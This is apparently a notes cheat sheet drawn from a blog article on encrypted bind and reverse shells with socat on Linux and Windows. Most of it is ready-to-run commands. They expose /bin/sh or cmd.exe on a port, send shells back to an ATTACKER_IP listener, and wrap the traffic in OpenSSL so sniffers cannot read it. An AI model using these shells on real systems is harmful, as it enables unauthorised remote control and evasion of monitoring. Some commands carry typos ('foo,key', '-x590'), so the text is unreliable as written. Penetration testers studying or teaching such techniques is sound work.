Encrypted Bind and Reverse Shells with Socat (Linux/Windows) Encrypt your traffic with openssl when using bind or reverse shells.
by erev0s
June 20, 2020
https://erev0s.com/blog/encrypted-bind-and-reverse-shells-socat/
This article shows how to use how to use socat to add encryption to reverse and bind shells using OpenSSL.
| Notes |
|---|
| swiss army knife |
| socat |
| netcat |
| encryption |
| bind shell |
| reverse shell |
| bind shell Linux: socat -d -d TCP4-LISTEN:4444 EXEC:/bin/sh |
| bind shell Windows: socat -d -d TCP4-LISTEN:4444 EXEC:‘cmd.exe’, pipes |
| bind shell client (from attacker machine): socat - TCP4:IP_ADDR:4444 |
| IP address |
| TCP |
| IPv4 |
| Kali Linux |
| Wireshark |
| reverse shell listener (attacker machine): socat -d -d TCP4-LISTEN:4444 STDOUT |
| reverse shell Linux: socat TCP4:IP_ADDRESS_OF_LISTENER:4444 EXEC:/bin/sh |
| reverse shell Windows: socat TCP4:IP_ADDRESS_OF_LISTENER:4444 EXEC:‘cmd.exe’, pipes |
| sniffer |
| openssl |
| certificate |
| certificate key file .key extension |
| certificate file .crt extention |
| certificate PEM file .pem extention |
| cat foo,key foo.crt > foo.pem |
| openssl req -newkey rsa:2048 -nodes -keyout foo.key -x590 -days 1000 -subj ‘/CN=www.foo.com/O=Foo Company LTD./C=US’ -out foo.crt |
| bind shell w/ ssl Linux: socat OPENSSL-LISTEN:4444,cert=foo.pem,verify=0,fork EXEC:/bin/sh |
| bind shell w/ ssl Windows: socat OPENSSL-LISTEN:4444,cert=foo.pem,verify=0,fork EXEC:‘cmd.exe’,pipes |
| bind shell client: socat - OPENSSL:IP_ADDRESS_OF_VICTIM:4444,verify=0 |
| socat verify=0 |
| reverse shell listener (attacker machine): socat -d -d OPENSSL-LISTEN:4444,cert=foo.pem,verify=0,fork STDOUT |
| reverse shell Linux: socat OPENSSL:ATTACKER_IP:4444,verify=0 EXEC:/bin/sh |
| reverse shell Windows: socat OPENSSL:ATTACKER_IP:4444,verify=0 EXEC:‘cmd.exe’,pipes |